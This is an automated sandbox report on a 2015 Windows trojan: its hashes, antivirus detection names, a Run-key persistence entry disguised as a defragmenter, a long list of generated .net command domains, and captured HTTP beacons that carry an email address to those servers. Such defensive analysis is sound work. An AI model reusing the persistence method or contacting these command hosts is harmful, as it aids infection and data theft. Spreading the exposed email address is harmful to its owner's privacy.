Analysis Date2015-08-19 13:23:40
MD536e2da098fba36ce422eaba2d644f50c
SHA11f56f75147435847b3973fc1d8b608e88dfbcc0a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7fffd6018508ead06200ba5bf14c217f sha1: 22df6c4f6f9e3fcedbac0ef4ea051e2e2db5a618 size: 301056
Section.rdata md5: d4608c97bc2aabe29b731a15878b32de sha1: ccc035e8b052304292860fe8588dfa268a38de27 size: 35328
Section.data md5: 924d0fb44d18628fbf14fcad1c94c42d sha1: 72816315455444253c1ac549d139cd805a573099 size: 90624
Timestamp2014-10-30 10:07:49
PackerMicrosoft Visual C++ ?.?
PEhashedbe13da617aec54bf60cfeec0d0a1773a40825b
IMPhash57447477bd84fac0e52646bad5db8483
AVCA (E-Trust Ino)Win32/Tnega.XAWS!suspicious
AVRisingno_virus
AVMcafeeTrojan-FEMT!36E2DA098FBA
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Kryptik-PJW [Trj]
AVEset (nod32)Win32/Agent.VNC
AVGrisoft (avg)Win32/Cryptor
AVSymantecTrojan.Gen
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BJ
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FORUCON.BMC
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.44890
AVF-SecureGen:Variant.Symmi.22722

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DCOM Adaptive Defragmenter ➝
C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\viroifmkv\dmspuuln.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.kvg
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\viroifmkv\gecjbrrug.exe"

Network Details:

DNSsweetoffice.net
Type: A
162.213.251.173
DNSmaterialsupply.net
Type: A
184.168.221.36
DNSlaughstrong.net
Type: A
50.21.189.209
DNSfinishstrong.net
Type: A
50.63.202.14
DNSsweettrouble.net
Type: A
50.31.0.103
DNSsubjectarrive.net
Type: A
DNSfinishsupply.net
Type: A
DNSleavesupply.net
Type: A
DNSfinishdistance.net
Type: A
DNSleavedistance.net
Type: A
DNSfinishoffice.net
Type: A
DNSleaveoffice.net
Type: A
DNSfinisharrive.net
Type: A
DNSleavearrive.net
Type: A
DNSsweetsupply.net
Type: A
DNSprobablysupply.net
Type: A
DNSsweetdistance.net
Type: A
DNSprobablydistance.net
Type: A
DNSprobablyoffice.net
Type: A
DNSsweetarrive.net
Type: A
DNSprobablyarrive.net
Type: A
DNSseveralsupply.net
Type: A
DNSseveraldistance.net
Type: A
DNSmaterialdistance.net
Type: A
DNSseveraloffice.net
Type: A
DNSmaterialoffice.net
Type: A
DNSseveralarrive.net
Type: A
DNSmaterialarrive.net
Type: A
DNSseverastrong.net
Type: A
DNSseveratrouble.net
Type: A
DNSlaughtrouble.net
Type: A
DNSseverapresident.net
Type: A
DNSlaughpresident.net
Type: A
DNSseveracaught.net
Type: A
DNSlaughcaught.net
Type: A
DNSsimplestrong.net
Type: A
DNSmotherstrong.net
Type: A
DNSsimpletrouble.net
Type: A
DNSmothertrouble.net
Type: A
DNSsimplepresident.net
Type: A
DNSmotherpresident.net
Type: A
DNSsimplecaught.net
Type: A
DNSmothercaught.net
Type: A
DNSmountainstrong.net
Type: A
DNSpossiblestrong.net
Type: A
DNSmountaintrouble.net
Type: A
DNSpossibletrouble.net
Type: A
DNSmountainpresident.net
Type: A
DNSpossiblepresident.net
Type: A
DNSmountaincaught.net
Type: A
DNSpossiblecaught.net
Type: A
DNSperhapsstrong.net
Type: A
DNSwindowstrong.net
Type: A
DNSperhapstrouble.net
Type: A
DNSwindowtrouble.net
Type: A
DNSperhapspresident.net
Type: A
DNSwindowpresident.net
Type: A
DNSperhapscaught.net
Type: A
DNSwindowcaught.net
Type: A
DNSwinterstrong.net
Type: A
DNSsubjectstrong.net
Type: A
DNSwintertrouble.net
Type: A
DNSsubjecttrouble.net
Type: A
DNSwinterpresident.net
Type: A
DNSsubjectpresident.net
Type: A
DNSwintercaught.net
Type: A
DNSsubjectcaught.net
Type: A
DNSleavestrong.net
Type: A
DNSfinishtrouble.net
Type: A
DNSleavetrouble.net
Type: A
DNSfinishpresident.net
Type: A
DNSleavepresident.net
Type: A
DNSfinishcaught.net
Type: A
DNSleavecaught.net
Type: A
DNSsweetstrong.net
Type: A
DNSprobablystrong.net
Type: A
DNSprobablytrouble.net
Type: A
DNSsweetpresident.net
Type: A
DNSprobablypresident.net
Type: A
DNSsweetcaught.net
Type: A
DNSprobablycaught.net
Type: A
DNSseveralstrong.net
Type: A
DNSmaterialstrong.net
Type: A
DNSseveraltrouble.net
Type: A
DNSmaterialtrouble.net
Type: A
HTTP GEThttp://sweetoffice.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://materialsupply.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://laughstrong.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://finishstrong.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
HTTP GEThttp://sweettrouble.net/index.php?email=jakab_barna@yahoo.com&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 162.213.251.173:80
Flows TCP192.168.1.1:1032 ➝ 184.168.221.36:80
Flows TCP192.168.1.1:1033 ➝ 50.21.189.209:80
Flows TCP192.168.1.1:1034 ➝ 50.63.202.14:80
Flows TCP192.168.1.1:1035 ➝ 50.31.0.103:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 77656574   ose..Host: sweet
0x00000070 (00112)   6f666669 63652e6e 65740d0a 0d0a       office.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206d 61746572   ose..Host: mater
0x00000070 (00112)   69616c73 7570706c 792e6e65 740d0a0d   ialsupply.net...
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206c 61756768   ose..Host: laugh
0x00000070 (00112)   7374726f 6e672e6e 65740d0a 0d0a0a0d   strong.net......
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 696e6973   ose..Host: finis
0x00000070 (00112)   68737472 6f6e672e 6e65740d 0a0d0a0d   hstrong.net.....
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a616b 61625f62 61726e61   mail=jakab_barna
0x00000020 (00032)   40796168 6f6f2e63 6f6d266d 6574686f   @yahoo.com&metho
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 77656574   ose..Host: sweet
0x00000070 (00112)   74726f75 626c652e 6e65740d 0a0d0a0d   trouble.net.....
0x00000080 (00128)   0a                                    .


Strings